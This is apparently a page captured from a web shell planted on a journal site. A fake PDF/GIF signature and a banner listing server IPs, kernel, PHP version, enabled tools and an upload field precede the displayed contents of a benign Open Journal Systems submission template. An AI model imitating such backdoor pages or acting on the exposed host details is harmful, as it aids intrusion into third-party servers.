%PDF-1.7 GIF89;
| Server IP : 172.66.157.178 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/plugins/themes/JetJournal/templates/author/submit/ |
Upload File : |
{**
* templates/author/submit/step4.tpl
*
* Copyright (c) 2003-2012 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* Step 4 of author article submission.
*
*}
{assign var="pageTitle" value="author.submit.step4"}
{include file="author/submit/submitHeader.tpl"}
<script type="text/javascript">
{literal}
<!--
function confirmForgottenUpload() {
var fieldValue = document.getElementById('submitForm').uploadSuppFile.value;
if (fieldValue) {
return confirm("{/literal}{translate key="author.submit.forgottenSubmitSuppFile"}{literal}");
}
return true;
}
// -->
{/literal}
</script>
<form id="submitForm" method="post" action="{url op="saveSubmit" path=$submitStep}" enctype="multipart/form-data">
<input type="hidden" name="articleId" value="{$articleId|escape}" />
{include file="common/formErrors.tpl"}
<p>{translate key="author.submit.supplementaryFilesInstructions"}</p>
<table class="listing" width="100%">
<tr>
<td colspan="5" class="headseparator"> </td>
</tr>
<tr class="heading" valign="bottom">
<td width="5%">{translate key="common.id"}</td>
<td width="40%">{translate key="common.title"}</td>
<td width="25%">{translate key="common.originalFileName"}</td>
<td width="15%" class="nowrap">{translate key="common.dateUploaded"}</td>
<td width="15%" align="right">{translate key="common.action"}</td>
</tr>
<tr>
<td colspan="6" class="headseparator"> </td>
</tr>
{foreach from=$suppFiles item=file}
<tr valign="top">
<td>{$file->getSuppFileId()}</td>
<td>{$file->getSuppFileTitle()|escape}</td>
<td>{$file->getOriginalFileName()|escape}</td>
<td>{$file->getDateSubmitted()|date_format:$dateFormatTrunc}</td>
<td align="right"><a href="{url op="submitSuppFile" path=$file->getSuppFileId() articleId=$articleId}" class="action">{translate key="common.edit"}</a> | <a href="{url op="deleteSubmitSuppFile" path=$file->getSuppFileId() articleId=$articleId}" onclick="return confirm('{translate|escape:"jsparam" key="author.submit.confirmDeleteSuppFile"}')" class="action">{translate key="common.delete"}</a></td>
</tr>
{foreachelse}
<tr valign="top">
<td colspan="6" class="nodata">{translate key="author.submit.noSupplementaryFiles"}</td>
</tr>
{/foreach}
</table>
<div class="separator"></div>
<table class="data" width="100%">
<tr>
<td width="30%" class="label">{fieldLabel name="uploadSuppFile" key="author.submit.uploadSuppFile"}</td>
<td width="70%" class="value">
<input type="file" name="uploadSuppFile" id="uploadSuppFile" class="uploadField" /> <input name="submitUploadSuppFile" type="submit" class="button" value="{translate key="common.upload"}" />
{if $currentJournal->getSetting('showEnsuringLink')}<a class="action" href="javascript:openHelp('{get_help_id key="editorial.sectionEditorsRole.review.blindPeerReview" url="true"}')">{translate key="reviewer.article.ensuringBlindReview"}</a>{/if}
</td>
</tr>
</table>
<div class="separator"></div>
<p><input type="submit" onclick="return confirmForgottenUpload()" value="{translate key="common.saveAndContinue"}" class="button defaultButton" /> <input type="button" value="{translate key="common.cancel"}" class="button" onclick="confirmAction('{url page="author"}', '{translate|escape:"jsparam" key="author.submit.cancelSubmission"}')" /></p>
</form>
{include file="common/footer.tpl"}